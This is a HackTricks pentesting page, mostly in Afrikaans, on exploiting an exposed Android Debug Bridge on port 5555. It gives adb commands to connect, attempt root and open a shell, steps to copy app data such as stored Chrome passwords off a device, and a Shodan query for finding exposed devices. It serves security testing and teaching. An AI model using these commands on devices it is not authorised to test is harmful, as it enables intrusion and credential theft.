hacktricks/network-services-pentesting/5555-android-debug-bridge.md

5555 - Android Debug Bridge

{% hint style="success" %} Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

• Kyk na die subskripsie planne!
• Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
• Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

{% endhint %}

Basic Information

Van die dokumentasie:

Android Debug Bridge (adb) is 'n veelsydige opdraglyn hulpmiddel wat jou toelaat om met 'n toestel te kommunikeer. Die adb opdrag fasiliteer 'n verskeidenheid toestel aksies, soos installeer en debugg apps, en dit bied toegang tot 'n Unix shell wat jy kan gebruik om 'n verskeidenheid opdragte op 'n toestel uit te voer.

Standaard poort: 5555.

PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)

Connect

As jy die ADB-diens in 'n poort van 'n toestel vind en jy kan daaraan koppel, kan jy 'n shell binne die stelsel kry:

adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell

Vir meer ADB-opdragte, kyk na die volgende bladsy:

{% content-ref url="../mobile-pentesting/android-app-pentesting/adb-commands.md" %} adb-commands.md {% endcontent-ref %}

Dump App data

Om die data van 'n toepassing heeltemal af te laai, kan jy:

# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"

You can use this trick to herwin sensitiewe inligting soos chrome wagwoorde. For more info about this check the information a references provided here.

Shodan

• android debug bridge

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

• Check the subscription plans!
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

{% endhint %}